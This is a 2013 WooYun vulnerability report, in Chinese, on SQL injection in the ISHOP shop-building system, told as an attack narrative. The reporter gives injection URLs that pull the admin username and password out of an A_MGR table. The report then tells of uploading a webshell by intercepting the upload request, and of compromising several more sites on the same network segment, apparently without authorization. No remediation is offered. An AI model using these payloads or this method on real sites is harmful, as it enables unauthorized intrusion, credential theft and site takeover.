当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018570

漏洞标题:ISHOP商场建站系统注入漏洞

相关厂商:ISHOP

漏洞作者: Evil Spirits

提交时间:2013-02-10 13:08

修复时间:2013-03-27 13:08

公开时间:2013-03-27 13:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-03-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

挖到ISHOP商场建站系统注入漏洞
ISHOP注入漏洞

详细说明:

挖到ISHOP商场建站系统注入漏洞过程
今天去日一台湾站,用各种工具扫一通 谷歌搜一通
发现一个注入点
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
习惯性的加’having1=1--
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—

tfxt.jpg


爆出Diary_A.dl_Title(这时候很激动啊)
那么继续
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
继续,一直爆下去
爆到几个字段和表段 但是没找到需要的管理用户的字段
蛋疼了 怎么办 然后去后台登陆页看源码

7t5.jpg


Input name= “ADUID”
Input name= “ADPWD”
很幸运 找到了字段那就继续
找到之后开始爆用户
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
测试了下 这个注入点只能爆到文章哪里的表
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了

gty.jpg


进后台
发现几个上传点 有的地方不能上传 而且防止恶意代码
没办法 各种百度各种找大牛 找到一只好像可以突破的马
在系统管理那里直接上传 不过没有显示地址
再上传一次 抓包 搞定OK

1rx.jpg


晚上不行了 去睡觉。。。
第二天刚起床 闲的没事做继续日站吧
找个站 就把这个站的旁c扫了下
发现c段也有一个购物站 ,然后还和这个站的模板差不多
就找到会员登录口测试
'and (select top 1 MGR_UID from A_MGR)>0—
果断爆到了 这时候我很激动 通杀
再次翻c段
翻出几个站 都成功拿下

漏洞证明:

1rx.jpg


gty.jpg

修复方案:

他们比我专业

版权声明:转载请注明来源 Evil Spirits@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝